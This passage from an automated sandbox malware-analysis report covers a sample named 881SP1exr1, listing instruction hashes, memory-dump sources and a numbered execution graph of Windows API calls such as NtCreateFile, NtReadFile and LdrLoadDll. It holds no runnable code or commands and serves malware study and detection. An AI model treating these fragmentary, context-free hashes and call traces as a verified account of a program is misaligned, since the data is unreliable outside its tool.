                                                                                                                • Instruction Fuzzy Hash: 80214571104204DFDB01DF58D9C0B66BF69FBC8328F60C269E90A1B256C73AE456CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 951ba069cf27680efb6c33e52f0e057cadc5951069903de4cd2f3cc708a6411a
                                                                                                                • Instruction ID: 820d60ceb7413d79974f1b33644d91be0dd8cc6e8b9434a6543f2a2d9d098ecc
                                                                                                                • Opcode Fuzzy Hash: 951ba069cf27680efb6c33e52f0e057cadc5951069903de4cd2f3cc708a6411a
                                                                                                                • Instruction Fuzzy Hash: 1E212671604204EFDB05DF98D9C4B26BBE5FB94328F20C66DE9094B356C336E446CA61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 08bb7b5901c6c82b98df21b97132aaf93cef0fec1aadf06e38eac5b9273f86af
                                                                                                                • Instruction ID: 14b0865a7926cbde8bb29e94996149224e19f405fd9e847e148429bab0ef8062
                                                                                                                • Opcode Fuzzy Hash: 08bb7b5901c6c82b98df21b97132aaf93cef0fec1aadf06e38eac5b9273f86af
                                                                                                                • Instruction Fuzzy Hash: 0B213471604204DFCB15DF98D9C4B26BFA5FB94318F20C56DD80A4B356C33AE447CA61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7141ea30c0fd263294a51673e1b84b606ff684cfc10a63615a63b4509048ffed
                                                                                                                • Instruction ID: 7049163d04b7210f6b6070b8804fbe5073744b9f5b1334aa112a37010e6c965d
                                                                                                                • Opcode Fuzzy Hash: 7141ea30c0fd263294a51673e1b84b606ff684cfc10a63615a63b4509048ffed
                                                                                                                • Instruction Fuzzy Hash: 0F2192755083809FCB03CF54D994711BFB1EB56318F28C5DAD8498F2A7C33A980ACB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction ID: 00649e786bf884430d1b85875da5738868cee651d963c86f6ce5b0a99e27a109
                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                • Instruction Fuzzy Hash: 16110072404280CFDB02CF54D9C4B56BF72FB94328F24C2A9D9090B257C33AE45ACBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643305675.000000000134D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0134D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_134d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction ID: 9317e10378370c612e5c3d7d4bdaac197e63743b827b0ffc250892ca9760398a
                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                • Instruction Fuzzy Hash: 7111BB75504280DFDB02CF54C5C4B15BFB1FB84228F24C6AAD8494B296C33AE40ACB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 584e80c4c91799f5ef93acea54a8f270f0ca802feac9e3d5db4a0b7f535a7539
                                                                                                                • Instruction ID: 1d85d67d0f85097198774a09537d6f1ddcc0dfe17017bcc248df90278ea49fb6
                                                                                                                • Opcode Fuzzy Hash: 584e80c4c91799f5ef93acea54a8f270f0ca802feac9e3d5db4a0b7f535a7539
                                                                                                                • Instruction Fuzzy Hash: 28012B310083849AE7125E69CD84B67BF9CEF81368F48C92AED090A286C279D840C6B5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643258673.000000000133D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0133D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_133d000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4db99fbb530082cd285069274a6e7a1f264e7552c851a1ddff4e49749486d329
                                                                                                                • Instruction ID: 7b5ad72664f1eb7a8acf9c14d8670a4b58686147da0d162d39c12b6e9e7277c4
                                                                                                                • Opcode Fuzzy Hash: 4db99fbb530082cd285069274a6e7a1f264e7552c851a1ddff4e49749486d329
                                                                                                                • Instruction Fuzzy Hash: B1F09671404384AEE7119E1ADCC8B62FFA8EF81738F18C45AED084F286C2799844CBB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1643619835.00000000015E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015E0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_15e0000_881SP1exr1.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d0a302e6fd28530a4f8f8648c1ed0e224d4d00c6a21d318184b2bee294b82ac5
                                                                                                                • Instruction ID: ac499f9c7f8c76b73d26d99be4617ae17d2f98d161c655624b95ac96368d8f12
                                                                                                                • Opcode Fuzzy Hash: d0a302e6fd28530a4f8f8648c1ed0e224d4d00c6a21d318184b2bee294b82ac5
                                                                                                                • Instruction Fuzzy Hash: 7CA14B32E0021A8FCF19DFB4C84459EBBF2BF85300B15856AE905AF265DF71D955CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:1.4%
                                                                                                                Dynamic/Decrypted Code Coverage:2.7%
                                                                                                                Signature Coverage:5.9%
                                                                                                                Total number of Nodes:559
                                                                                                                Total number of Limit Nodes:73
                                                                                                                execution_graph 98134 41f0e0 98135 41f0eb 98134->98135 98137 41b930 98134->98137 98138 41b956 98137->98138 98145 409d30 98138->98145 98140 41b962 98141 41b983 98140->98141 98153 40c1b0 98140->98153 98141->98135 98143 41b975 98189 41a670 98143->98189 98192 409c80 98145->98192 98147 409d3d 98148 409d44 98147->98148 98204 409c20 98147->98204 98148->98140 98154 40c1d5 98153->98154 98625 40b1b0 98154->98625 98156 40c22c 98629 40ae30 98156->98629 98158 40c252 98188 40c4a3 98158->98188 98638 414390 98158->98638 98160 40c297 98160->98188 98641 408a60 98160->98641 98162 40c2db 98162->98188 98648 41a4c0 98162->98648 98166 40c331 98167 40c338 98166->98167 98660 419fd0 98166->98660 98169 41bd80 2 API calls 98167->98169 98170 40c345 98169->98170 98170->98143 98172 40c382 98173 41bd80 2 API calls 98172->98173 98174 40c389 98173->98174 98174->98143 98175 40c392 98176 40f490 3 API calls 98175->98176 98177 40c406 98176->98177 98177->98167 98178 40c411 98177->98178 98179 41bd80 2 API calls 98178->98179 98180 40c435 98179->98180 98665 41a020 98180->98665 98183 419fd0 2 API calls 98184 40c470 98183->98184 98184->98188 98670 419de0 98184->98670 98187 41a670 2 API calls 98187->98188 98188->98143 98190 41af20 LdrLoadDll 98189->98190 98191 41a68f ExitProcess 98190->98191 98191->98141 98193 409c93 98192->98193 98243 418b80 LdrLoadDll 98192->98243 98223 418a30 98193->98223 98196 409c9c 98197 409ca6 98196->98197 98226 41b270 98196->98226 98197->98147 98199 409ce3 98199->98197 98237 409aa0 98199->98237 98201 409d03 98244 409620 LdrLoadDll 98201->98244 98203 409d15 98203->98147 98598 41b560 98204->98598 98207 41b560 LdrLoadDll 98208 409c4b 98207->98208 98209 41b560 LdrLoadDll 98208->98209 98210 409c61 98209->98210 98211 40f170 98210->98211 98212 40f189 98211->98212 98607 40b030 98212->98607 98214 40f19c 98611 41a1a0 98214->98611 98217 409d55 98217->98140 98219 40f1c2 98220 40f1ed 98219->98220 98617 41a220 98219->98617 98221 41a450 2 API calls 98220->98221 98221->98217 98245 41a5c0 98223->98245 98227 41b289 98226->98227 98258 414a40 98227->98258 98229 41b2a1 98230 41b2aa 98229->98230 98297 41b0b0 98229->98297 98230->98199 98232 41b2be 98232->98230 98315 419ec0 98232->98315 98576 407ea0 98237->98576 98239 409ac1 98239->98201 98240 409aba 98240->98239 98589 408160 98240->98589 98243->98193 98244->98203 98248 41af20 98245->98248 98247 418a45 98247->98196 98249 41af30 98248->98249 98251 41af52 98248->98251 98252 414e40 98249->98252 98251->98247 98253 414e4e 98252->98253 98254 414e5a 98252->98254 98253->98254 98257 4152c0 LdrLoadDll 98253->98257 98254->98251 98256 414fac 98256->98251 98257->98256 98259 414d75 98258->98259 98260 414a54 98258->98260 98259->98229 98260->98259 98323 419c10 98260->98323 98263 414b80 98327 41a320 98263->98327 98264 414b63 98384 41a420 LdrLoadDll 98264->98384 98267 414b6d 98267->98229 98268 414ba7 98269 41bd80 2 API calls 98268->98269 98272 414bb3 98269->98272 98270 414d39 98271 41a450 2 API calls 98270->98271 98274 414d40 98271->98274 98272->98267 98272->98270 98273 414d4f 98272->98273 98277 414c42 98272->98277 98393 414780 LdrLoadDll NtReadFile NtClose 98273->98393 98274->98229 98276 414d62 98276->98229 98278 414ca9 98277->98278 98280 414c51 98277->98280 98278->98270 98279 414cbc 98278->98279 98386 41a2a0 98279->98386 98282 414c56 98280->98282 98283 414c6a 98280->98283 98385 414640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 98282->98385 98284 414c87 98283->98284 98285 414c6f 98283->98285 98284->98274 98342 414400 98284->98342 98330 4146e0 98285->98330 98290 414c60 98290->98229 98291 414c7d 98291->98229 98293 414d1c 98390 41a450 98293->98390 98294 414c9f 98294->98229 98296 414d28 98296->98229 98298 41b0c1 98297->98298 98299 41b0d3 98298->98299 98412 41bd00 98298->98412 98299->98232 98301 41b0f4 98415 414060 98301->98415 98303 41b140 98303->98232 98304 41b117 98304->98303 98305 414060 3 API calls 98304->98305 98307 41b139 98305->98307 98307->98303 98447 415380 98307->98447 98308 41b1ca 98309 41b1da 98308->98309 98542 41aec0 LdrLoadDll 98308->98542 98457 41ad30 98309->98457 98312 41b208 98537 419e80 98312->98537 98316 41af20 LdrLoadDll 98315->98316 98317 419edc 98316->98317 98570 1452c0a 98317->98570 98318 419ef7 98320 41bd80 98318->98320 98573 41a630 98320->98573 98322 41b319 98322->98199 98324 419c1c 98323->98324 98325 41af20 LdrLoadDll 98324->98325 98326 414b34 98325->98326 98326->98263 98326->98264 98326->98267 98328 41a33c NtCreateFile 98327->98328 98329 41af20 LdrLoadDll 98327->98329 98328->98268 98329->98328 98331 4146fc 98330->98331 98332 41a2a0 LdrLoadDll 98331->98332 98333 41471d 98332->98333 98334 414724 98333->98334 98335 414738 98333->98335 98336 41a450 2 API calls 98334->98336 98337 41a450 2 API calls 98335->98337 98339 41472d 98336->98339 98338 414741 98337->98338 98394 41bf90 LdrLoadDll RtlAllocateHeap 98338->98394 98339->98291 98341 41474c 98341->98291 98343 41444b 98342->98343 98344 41447e 98342->98344 98346 41a2a0 LdrLoadDll 98343->98346 98345 4145c9 98344->98345 98349 41449a 98344->98349 98348 41a2a0 LdrLoadDll 98345->98348 98347 414466 98346->98347 98350 41a450 2 API calls 98347->98350 98354 4145e4 98348->98354 98351 41a2a0 LdrLoadDll 98349->98351 98352 41446f 98350->98352 98353 4144b5 98351->98353 98352->98294 98356 4144d1 98353->98356 98357 4144bc 98353->98357 98407 41a2e0 LdrLoadDll 98354->98407 98360 4144d6 98356->98360 98361 4144ec 98356->98361 98359 41a450 2 API calls 98357->98359 98358 41461e 98362 41a450 2 API calls 98358->98362 98363 4144c5 98359->98363 98364 41a450 2 API calls 98360->98364 98370 4144f1 98361->98370 98395 41bf50 98361->98395 98365 414629 98362->98365 98363->98294 98366 4144df 98364->98366 98365->98294 98366->98294 98367 414503 98367->98294 98370->98367 98398 41a3d0 98370->98398 98371 41456e 98374 414575 98371->98374 98375 41458a 98371->98375 98372 414557 98372->98371 98406 41a260 LdrLoadDll 98372->98406 98377 41a450 2 API calls 98374->98377 98376 41a450 2 API calls 98375->98376 98378 414593 98376->98378 98377->98367 98379 4145bf 98378->98379 98401 41bb50 98378->98401 98379->98294 98381 4145aa 98382 41bd80 2 API calls 98381->98382 98383 4145b3 98382->98383 98383->98294 98384->98267 98385->98290 98387 414d04 98386->98387 98388 41af20 LdrLoadDll 98386->98388 98389 41a2e0 LdrLoadDll 98387->98389 98388->98387 98389->98293 98391 41a46c NtClose 98390->98391 98392 41af20 LdrLoadDll 98390->98392 98391->98296 98392->98391 98393->98276 98394->98341 98408 41a5f0 98395->98408 98397 41bf68 98397->98370 98399 41af20 LdrLoadDll 98398->98399 98400 41a3ec NtReadFile 98399->98400 98400->98372 98402 41bb74 98401->98402 98403 41bb5d 98401->98403 98402->98381 98403->98402 98404 41bf50 2 API calls 98403->98404 98405 41bb8b 98404->98405 98405->98381 98406->98371 98407->98358 98409 41a605 98408->98409 98410 41af20 LdrLoadDll 98409->98410 98411 41a60c RtlAllocateHeap 98410->98411 98411->98397 98543 41a500 98412->98543 98414 41bd2d 98414->98301 98416 414071 98415->98416 98418 414079 98415->98418 98416->98304 98417 41434c 98417->98304 98418->98417 98546 41cef0 98418->98546 98420 4140cd 98421 41cef0 2 API calls 98420->98421 98424 4140d8 98421->98424 98422 414126 98425 41cef0 2 API calls 98422->98425 98424->98422 98426 41d020 3 API calls 98424->98426 98557 41cf90 LdrLoadDll RtlAllocateHeap RtlFreeHeap 98424->98557 98428 41413a 98425->98428 98426->98424 98427 414197 98429 41cef0 2 API calls 98427->98429 98428->98427 98551 41d020 98428->98551 98430 4141ad 98429->98430 98432 4141ea 98430->98432 98434 41d020 3 API calls 98430->98434 98433 41cef0 2 API calls 98432->98433 98435 4141f5 98433->98435 98434->98430 98436 41d020 3 API calls 98435->98436 98443 41422f 98435->98443 98436->98435 98438 414324 98559 41cf50 LdrLoadDll RtlFreeHeap 98438->98559 98440 41432e 98560 41cf50 LdrLoadDll RtlFreeHeap 98440->98560 98442 414338 98561 41cf50 LdrLoadDll RtlFreeHeap 98442->98561 98558 41cf50 LdrLoadDll RtlFreeHeap 98443->98558 98445 414342 98562 41cf50 LdrLoadDll RtlFreeHeap 98445->98562 98448 415391 98447->98448 98449 414a40 8 API calls 98448->98449 98451 4153a7 98449->98451 98450 4153fa 98450->98308 98451->98450 98452 4153e2 98451->98452 98453 4153f5 98451->98453 98454 41bd80 2 API calls 98452->98454 98455 41bd80 2 API calls 98453->98455 98456 4153e7 98454->98456 98455->98450 98456->98308 98458 41ad3d 98457->98458 98563 41abf0 98458->98563 98461 41abf0 LdrLoadDll 98462 41ad4d 98461->98462 98463 41abf0 LdrLoadDll 98462->98463 98464 41ad56 98463->98464 98465 41abf0 LdrLoadDll 98464->98465 98466 41ad5f 98465->98466 98467 41abf0 LdrLoadDll 98466->98467 98468 41ad68 98467->98468 98469 41abf0 LdrLoadDll 98468->98469 98470 41ad71 98469->98470 98471 41abf0 LdrLoadDll 98470->98471 98472 41ad7d 98471->98472 98473 41abf0 LdrLoadDll 98472->98473 98474 41ad86 98473->98474 98475 41abf0 LdrLoadDll 98474->98475 98476 41ad8f 98475->98476 98477 41abf0 LdrLoadDll 98476->98477 98478 41ad98 98477->98478 98479 41abf0 LdrLoadDll 98478->98479 98480 41ada1 98479->98480 98481 41abf0 LdrLoadDll 98480->98481 98482 41adaa 98481->98482 98483 41abf0 LdrLoadDll 98482->98483 98484 41adb6 98483->98484 98485 41abf0 LdrLoadDll 98484->98485 98486 41adbf 98485->98486 98487 41abf0 LdrLoadDll 98486->98487 98488 41adc8 98487->98488 98489 41abf0 LdrLoadDll 98488->98489 98490 41add1 98489->98490 98491 41abf0 LdrLoadDll 98490->98491 98492 41adda 98491->98492 98493 41abf0 LdrLoadDll 98492->98493 98494 41ade3 98493->98494 98495 41abf0 LdrLoadDll 98494->98495 98496 41adef 98495->98496 98497 41abf0 LdrLoadDll 98496->98497 98498 41adf8 98497->98498 98499 41abf0 LdrLoadDll 98498->98499 98500 41ae01 98499->98500 98501 41abf0 LdrLoadDll 98500->98501 98502 41ae0a 98501->98502 98503 41abf0 LdrLoadDll 98502->98503 98504 41ae13 98503->98504 98505 41abf0 LdrLoadDll 98504->98505 98506 41ae1c 98505->98506 98507 41abf0 LdrLoadDll 98506->98507 98508 41ae28 98507->98508 98509 41abf0 LdrLoadDll 98508->98509 98510 41ae31 98509->98510 98511 41abf0 LdrLoadDll 98510->98511 98512 41ae3a 98511->98512 98513 41abf0 LdrLoadDll 98512->98513 98514 41ae43 98513->98514 98515 41abf0 LdrLoadDll 98514->98515 98516 41ae4c 98515->98516 98517 41abf0 LdrLoadDll 98516->98517 98518 41ae55 98517->98518 98519 41abf0 LdrLoadDll 98518->98519 98520 41ae61 98519->98520 98521 41abf0 LdrLoadDll 98520->98521 98522 41ae6a 98521->98522 98523 41abf0 LdrLoadDll 98522->98523 98524 41ae73 98523->98524 98525 41abf0 LdrLoadDll 98524->98525 98526 41ae7c 98525->98526 98527 41abf0 LdrLoadDll 98526->98527 98528 41ae85 98527->98528 98529 41abf0 LdrLoadDll 98528->98529 98530 41ae8e 98529->98530 98531 41abf0 LdrLoadDll 98530->98531 98532 41ae9a 98531->98532 98533 41abf0 LdrLoadDll 98532->98533 98534 41aea3 98533->98534 98535 41abf0 LdrLoadDll 98534->98535 98536 41aeac 98535->98536 98536->98312 98538 41af20 LdrLoadDll 98537->98538 98539 419e9c 98538->98539 98569 1452df0 LdrInitializeThunk 98539->98569 98540 419eb3 98540->98232 98542->98309 98544 41a51c NtAllocateVirtualMemory 98543->98544 98545 41af20 LdrLoadDll 98543->98545 98544->98414 98545->98544 98547 41cf00 98546->98547 98548 41cf06 98546->98548 98547->98420 98549 41bf50 2 API calls 98548->98549 98550 41cf2c 98549->98550 98550->98420 98552 41cf90 98551->98552 98553 41bf50 2 API calls 98552->98553 98554 41cfed 98552->98554 98555 41cfca 98553->98555 98554->98428 98556 41bd80 2 API calls 98555->98556 98556->98554 98557->98424 98558->98438 98559->98440 98560->98442 98561->98445 98562->98417 98564 41ac0b 98563->98564 98565 414e40 LdrLoadDll 98564->98565 98566 41ac2b 98565->98566 98567 414e40 LdrLoadDll 98566->98567 98568 41acd7 98566->98568 98567->98568 98568->98461 98569->98540 98571 1452c11 98570->98571 98572 1452c1f LdrInitializeThunk 98570->98572 98571->98318 98572->98318 98574 41af20 LdrLoadDll 98573->98574 98575 41a64c RtlFreeHeap 98574->98575 98575->98322 98577 407eb0 98576->98577 98578 407eab 98576->98578 98579 41bd00 2 API calls 98577->98579 98578->98240 98582 407ed5 98579->98582 98580 407f38 98580->98240 98581 419e80 2 API calls 98581->98582 98582->98580 98582->98581 98583 407f3e 98582->98583 98588 41bd00 2 API calls 98582->98588 98592 41a580 98582->98592 98584 407f64 98583->98584 98586 41a580 2 API calls 98583->98586 98584->98240 98587 407f55 98586->98587 98587->98240 98588->98582 98590 40817e 98589->98590 98591 41a580 2 API calls 98589->98591 98590->98201 98591->98590 98593 41a59c 98592->98593 98594 41af20 LdrLoadDll 98592->98594 98597 1452c70 LdrInitializeThunk 98593->98597 98594->98593 98595 41a5b3 98595->98582 98597->98595 98599 41b583 98598->98599 98602 40ace0 98599->98602 98601 409c3a 98601->98207 98604 40ace3 98602->98604 98603 40ad0b 98603->98601 98604->98603 98605 40ad40 LdrLoadDll 98604->98605 98606 40ad57 98604->98606 98605->98606 98606->98601 98609 40b053 98607->98609 98608 40b0d0 98608->98214 98609->98608 98623 419c50 LdrLoadDll 98609->98623 98612 40f1ab 98611->98612 98613 41af20 LdrLoadDll 98611->98613 98612->98217 98614 41a790 98612->98614 98613->98612 98615 41a7af LookupPrivilegeValueW 98614->98615 98616 41af20 LdrLoadDll 98614->98616 98615->98219 98616->98615 98618 41a236 98617->98618 98619 41af20 LdrLoadDll 98618->98619 98620 41a23c 98619->98620 98624 1452ea0 LdrInitializeThunk 98620->98624 98621 41a25b 98621->98220 98623->98608 98624->98621 98626 40b1e0 98625->98626 98627 40b030 LdrLoadDll 98626->98627 98628 40b1f4 98627->98628 98628->98156 98630 40ae41 98629->98630 98631 40ae3d 98629->98631 98632 40ae5a 98630->98632 98633 40ae8c 98630->98633 98631->98158 98675 419c90 LdrLoadDll 98632->98675 98676 419c90 LdrLoadDll 98633->98676 98635 40ae9d 98635->98158 98637 40ae7c 98637->98158 98639 40f490 3 API calls 98638->98639 98640 4143b6 98639->98640 98640->98160 98677 4087a0 98641->98677 98644 4087a0 19 API calls 98645 408a8a 98644->98645 98647 408a9d 98645->98647 98695 40f700 10 API calls 98645->98695 98647->98162 98649 41af20 LdrLoadDll 98648->98649 98650 41a4dc 98649->98650 98814 1452e80 LdrInitializeThunk 98650->98814 98651 40c312 98653 40f490 98651->98653 98654 40f4ad 98653->98654 98815 419f80 98654->98815 98657 40f4f5 98657->98166 98658 419fd0 2 API calls 98659 40f51e 98658->98659 98659->98166 98661 419fec 98660->98661 98662 41af20 LdrLoadDll 98660->98662 98821 1452d10 LdrInitializeThunk 98661->98821 98662->98661 98663 40c375 98663->98172 98663->98175 98666 41af20 LdrLoadDll 98665->98666 98667 41a03c 98666->98667 98822 1452d30 LdrInitializeThunk 98667->98822 98668 40c449 98668->98183 98671 41af20 LdrLoadDll 98670->98671 98672 419dfc 98671->98672 98823 1452fb0 LdrInitializeThunk 98672->98823 98673 40c49c 98673->98187 98675->98637 98676->98635 98678 407ea0 4 API calls 98677->98678 98693 4087ba 98677->98693 98678->98693 98679 408a49 98679->98644 98679->98647 98680 408a3f 98681 408160 2 API calls 98680->98681 98681->98679 98684 419ec0 2 API calls 98684->98693 98686 41a450 LdrLoadDll NtClose 98686->98693 98689 40c4b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 98689->98693 98692 419de0 2 API calls 98692->98693 98693->98679 98693->98680 98693->98684 98693->98686 98693->98689 98693->98692 98696 419cd0 98693->98696 98699 4085d0 98693->98699 98711 40f5e0 LdrLoadDll NtClose 98693->98711 98712 419d50 LdrLoadDll 98693->98712 98713 419d80 LdrLoadDll 98693->98713 98714 419e10 LdrLoadDll 98693->98714 98715 4083a0 98693->98715 98731 405f60 LdrLoadDll 98693->98731 98695->98647 98697 419cec 98696->98697 98698 41af20 LdrLoadDll 98696->98698 98697->98693 98698->98697 98700 4085e6 98699->98700 98732 419840 98700->98732 98702 4085ff 98707 408771 98702->98707 98753 4081a0 98702->98753 98704 4086e5 98705 4083a0 11 API calls 98704->98705 98704->98707 98706 408713 98705->98706 98706->98707 98708 419ec0 2 API calls 98706->98708 98707->98693 98709 408748 98708->98709 98709->98707 98710 41a4c0 2 API calls 98709->98710 98710->98707 98711->98693 98712->98693 98713->98693 98714->98693 98716 4083c9 98715->98716 98793 408310 98716->98793 98718 4083dc 98720 41a4c0 2 API calls 98718->98720 98721 408467 98718->98721 98724 408462 98718->98724 98801 40f660 98718->98801 98720->98718 98721->98693 98722 41a450 2 API calls 98723 40849a 98722->98723 98723->98721 98725 419cd0 LdrLoadDll 98723->98725 98724->98722 98726 4084ff 98725->98726 98726->98721 98805 419d10 98726->98805 98728 408563 98728->98721 98729 414a40 8 API calls 98728->98729 98730 4085b8 98729->98730 98730->98693 98731->98693 98733 41bf50 2 API calls 98732->98733 98734 419857 98733->98734 98760 409310 98734->98760 98736 419872 98737 4198b0 98736->98737 98738 419899 98736->98738 98741 41bd00 2 API calls 98737->98741 98739 41bd80 2 API calls 98738->98739 98740 4198a6 98739->98740 98740->98702 98742 4198ea 98741->98742 98743 41bd00 2 API calls 98742->98743 98744 419903 98743->98744 98750 419ba4 98744->98750 98766 41bd40 98744->98766 98747 419b90 98748 41bd80 2 API calls 98747->98748 98749 419b9a 98748->98749 98749->98702 98751 41bd80 2 API calls 98750->98751 98752 419bf9 98751->98752 98752->98702 98754 40829f 98753->98754 98755 4081b5 98753->98755 98754->98704 98755->98754 98756 414a40 8 API calls 98755->98756 98758 408222 98756->98758 98757 408249 98757->98704 98758->98757 98759 41bd80 2 API calls 98758->98759 98759->98757 98761 409335 98760->98761 98762 409368 98761->98762 98763 40ace0 LdrLoadDll 98761->98763 98765 40938d 98762->98765 98769 40cf10 98762->98769 98763->98762 98765->98736 98787 41a540 98766->98787 98770 40cf3c 98769->98770 98771 41a1a0 LdrLoadDll 98770->98771 98772 40cf55 98771->98772 98773 40cf5c 98772->98773 98780 41a1e0 98772->98780 98773->98765 98777 40cf97 98778 41a450 2 API calls 98777->98778 98779 40cfba 98778->98779 98779->98765 98781 41a1fc 98780->98781 98782 41af20 LdrLoadDll 98780->98782 98786 1452ca0 LdrInitializeThunk 98781->98786 98782->98781 98783 40cf7f 98783->98773 98785 41a7d0 LdrLoadDll 98783->98785 98785->98777 98786->98783 98788 41af20 LdrLoadDll 98787->98788 98789 41a55c 98788->98789 98792 1452f90 LdrInitializeThunk 98789->98792 98790 419b89 98790->98747 98790->98750 98792->98790 98794 408328 98793->98794 98795 40ace0 LdrLoadDll 98794->98795 98796 408343 98795->98796 98797 414e40 LdrLoadDll 98796->98797 98798 408353 98797->98798 98799 40835c PostThreadMessageW 98798->98799 98800 408370 98798->98800 98799->98800 98800->98718 98802 40f673 98801->98802 98808 419e50 98802->98808 98806 419d2c 98805->98806 98807 41af20 LdrLoadDll 98805->98807 98806->98728 98807->98806 98809 41af20 LdrLoadDll 98808->98809 98810 419e6c 98809->98810 98813 1452dd0 LdrInitializeThunk 98810->98813 98811 40f69e 98811->98718 98813->98811 98814->98651 98816 41af20 LdrLoadDll 98815->98816 98817 419f9c 98816->98817 98820 1452f30 LdrInitializeThunk 98817->98820 98818 40f4ee 98818->98657 98818->98658 98820->98818 98821->98663 98822->98668 98823->98673 98825 1452ad0 LdrInitializeThunk

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A415
                                                                                                                • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A475
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_2_2_400000_881SP1exr1.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseFileRead
                                                                                                                • String ID: bMA$bMA
                                                                                                                • API String ID: 752142053-1998556560
                                                                                                                • Opcode ID: 4555b8db24263beb396bddce414187ec1e3ee0d2ccf8c281040a10ff5ee7e2c3
                                                                                                                • Instruction ID: c5433787d6f9d94ca67f4c19549f6707bba6345fab498e1b4a6d86f392923fb9
                                                                                                                • Opcode Fuzzy Hash: 4555b8db24263beb396bddce414187ec1e3ee0d2ccf8c281040a10ff5ee7e2c3
                                                                                                                • Instruction Fuzzy Hash: A4112DB6204108BFDB14DF98DC84DEB77ADEF8C310B14865DFA5C87205C634E8518BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
